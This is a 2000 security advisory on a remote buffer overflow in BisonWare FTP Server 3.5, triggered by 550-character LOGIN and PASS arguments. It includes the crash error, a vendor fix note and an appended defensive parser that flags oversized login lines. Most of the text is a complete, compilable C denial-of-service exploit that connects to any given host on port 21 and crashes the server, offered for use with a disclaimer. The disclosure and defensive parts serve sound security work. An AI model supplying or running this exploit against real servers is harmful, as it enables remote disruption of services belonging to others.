"BisonWare is an FTP server that runs on the Windows platform. An intruder can crash the FTP server remotely from outside without needing to log in. Even with no legitimate account on the system it is still possible to attack the FTP server."

Conde Vampiro
Roses Labs / w00w00
http://www.roses-labs.com
Advanced Security Research.

Roses Labs Security Advisory
----------------------------

Author: Conde Vampiro
Roses Labs Advisory Code: RLA002
Date: 2/29/2000.
Software: BisonWare FTP Server V3.5
Platform: Windows 9x/NT.
Risk: Remote buffer overflow that allows crashing the FTP server. (It may also be possible to execute arbitrary code.)

------------
Introduction
------------

Bison FTP Server is an FTP server that runs on Windows platforms. An intruder can launch an attack that will crash the FTP server.

------
Detail
------

Sending a "LOGIN" and a "PASSWORD" of 550 characters each will crash the FTP server. This is the error the FTP server produces:

"Exception EAccessViolation in module BISONFTP.EXE at
0A0D4858. Access vilation at address 0A0D5858. Read of
address 0A0D5858."

----
Code
----

Warning: Neither Roses Labs nor the author accept any responsibility for the use of this code. This code will crash the FTP server.

------- CODE START -------
/*
 * FILE: rlxbison.c
 * CODER: Conde Vampiro.
 * DATE: 2/29/2000.
 * ABSTRACT: Remote DoS of BISON FTP Server 3.5
 *
 * Compile: gcc rlxbison.c -o rlbison
 *
 * Roses Labs / w00w00
 * http://www.roses-labs.com
 * Advanced Security Research.
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <unistd.h>

/* Defines */
#define MAX 551          /* 550 filler bytes plus the terminating NUL */
#define MAXDATA 1024

/* Global variables */
int sock;
int i;
char datacrap[MAX];
char *temp;
char tempdata[MAXDATA];
char buf[MAXDATA];
struct hostent *host;
struct sockaddr_in KillFTP;

/* Prototypes */
unsigned long resolve(char *host_name);
char *crap(int num);

/* Main */
int main(int argc, char *argv[])
{
  if(argc < 2) {
    printf("Usage: %s <Host>\n", argv[0]);
    exit(-1);
  }

  KillFTP.sin_family=AF_INET;
  KillFTP.sin_addr.s_addr=resolve(argv[1]);
  if(!KillFTP.sin_addr.s_addr) {
    printf("Host Unknown: %s\n",argv[1]);
    exit(-1);
  }
  KillFTP.sin_port=htons(21);

  sock=socket(AF_INET, SOCK_STREAM, 0);
  if(sock < 0) {
    printf("Error creating socket!!\n");
    exit(-1);
  }

  if(!connect(sock,(struct sockaddr *)&KillFTP, sizeof(KillFTP))) {
    printf("Roses Labs Bison FTP Xploit\n");
    printf("Remote crashing code!!!\n");
    /* Read the server banner (and any continuation) before sending commands */
    recv(sock,tempdata,sizeof(tempdata),0);
    sleep(1);
    recv(sock,tempdata,sizeof(tempdata),0);
    temp=crap(MAX);
    sprintf(buf,"LOGIN %s\n",temp);
    send(sock,buf,strlen(buf),0);
    sprintf(buf,"PASS %s\n",temp);
    send(sock,buf,strlen(buf),0);
    printf("Host %s crashed!!\n",argv[1]);
  }
  else {
    printf("Couldn't connect to %s on port 21,\n", argv[1]);
    exit(-1);
  }

  if(close(sock)) {
    printf("Error closing socket!!\n");
    exit(-1);
  }
  return(0);
}

/* Functions */
unsigned long resolve(char *host_name)
{
  struct in_addr addr;
  struct hostent *host_nam;

  /* Accept a dotted-quad address directly, otherwise resolve the host name */
  if((addr.s_addr = inet_addr(host_name)) == -1) {
    if(!(host_nam = gethostbyname(host_name)))
      return(0);
    memcpy((char *) &addr.s_addr, host_nam->h_addr, host_nam->h_length);
  }
  return(addr.s_addr);
}

/* Fill the buffer with num-1 'X' characters and NUL-terminate it */
char *crap(int num)
{
  for(i=0;i<num-1;i++) {
    datacrap[i]='X';
  }
  datacrap[num-1]='\0';
  return(datacrap);
}
/* w00w00 E0F */
------- CODE END -------

---
Fix
---

This problem is fixed in V4.1, out soon.

----
Note
----

This bug was found using Cyber Host Auditor (CHA). CHA is a security tool written by Roses Labs to discover DoS conditions and possible buffer overflows in an easy way.

Roses Labs / w00w00
http://www.roses-labs.com
Advanced Security Research.
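As an added example (not part of the advisory or of the BisonWare code), here is the server-side check that this class of bug lacks: a bounded FTP command-line parser in C that reports the 550-byte LOGIN/PASS arguments from the Detail section instead of copying them into a fixed buffer, plus a counter over a constructed capture that flags such lines the way a log or IDS rule would. The 255-byte cap, the function names and the sample lines are assumptions.

```c
#include <string.h>
#include <ctype.h>

#define FTP_MAX_ARG 255   /* assumed server-side cap on a USER/PASS argument */
enum { FTP_OK = 0, FTP_BAD_SYNTAX = 1, FTP_ARG_TOO_LONG = 2 };

struct ftp_cmd {
    char verb[8];               /* standard verbs are 3-4 letters; the advisory's "LOGIN" is 5 */
    char arg[FTP_MAX_ARG + 1];
    size_t arg_len;             /* length the client sent, recorded even when rejected */
};

/* Parse one control-channel line "VERB [arg]\r\n" into bounded storage.
 * An oversized argument is reported, never copied into the fixed buffer. */
int ftp_parse_line(const char *line, struct ftp_cmd *out)
{
    size_t i = 0, v = 0, start;
    memset(out, 0, sizeof *out);
    while (isalpha((unsigned char)line[i]) && v < sizeof out->verb - 1)
        out->verb[v++] = (char)toupper((unsigned char)line[i++]);
    if (v == 0 || (line[i] != ' ' && line[i] != '\r' && line[i] != '\n' && line[i] != '\0'))
        return FTP_BAD_SYNTAX;
    while (line[i] == ' ') i++;
    start = i;
    while (line[i] != '\0' && line[i] != '\r' && line[i] != '\n') i++;
    out->arg_len = i - start;
    if (out->arg_len > FTP_MAX_ARG) return FTP_ARG_TOO_LONG;   /* refuse before touching the buffer */
    memcpy(out->arg, line + start, out->arg_len);
    out->arg[out->arg_len] = '\0';
    return FTP_OK;
}

/* Count login commands whose argument exceeds the cap, the way a log or IDS rule would. */
int count_oversized_logins(const char *const *lines, size_t n)
{
    int hits = 0; struct ftp_cmd c;
    for (size_t k = 0; k < n; k++) {
        if (ftp_parse_line(lines[k], &c) != FTP_ARG_TOO_LONG) continue;
        if (!strcmp(c.verb, "USER") || !strcmp(c.verb, "LOGIN") || !strcmp(c.verb, "PASS"))
            hits++;
    }
    return hits;
}

/* Constructed capture: a normal login, then the advisory's 550-byte LOGIN and PASS lines. */
int demo_hits(void)
{
    static char big_login[560], big_pass[560];
    memcpy(big_login, "LOGIN ", 6); memset(big_login + 6, 'X', 550); strcpy(big_login + 556, "\r\n");
    memcpy(big_pass, "PASS ", 5);   memset(big_pass + 5, 'X', 550);  strcpy(big_pass + 555, "\r\n");
    const char *capture[] = { "USER anonymous\r\n", "PASS guest@example.org\r\n", big_login, big_pass };
    return count_oversized_logins(capture, 4);   /* 2 */
}
```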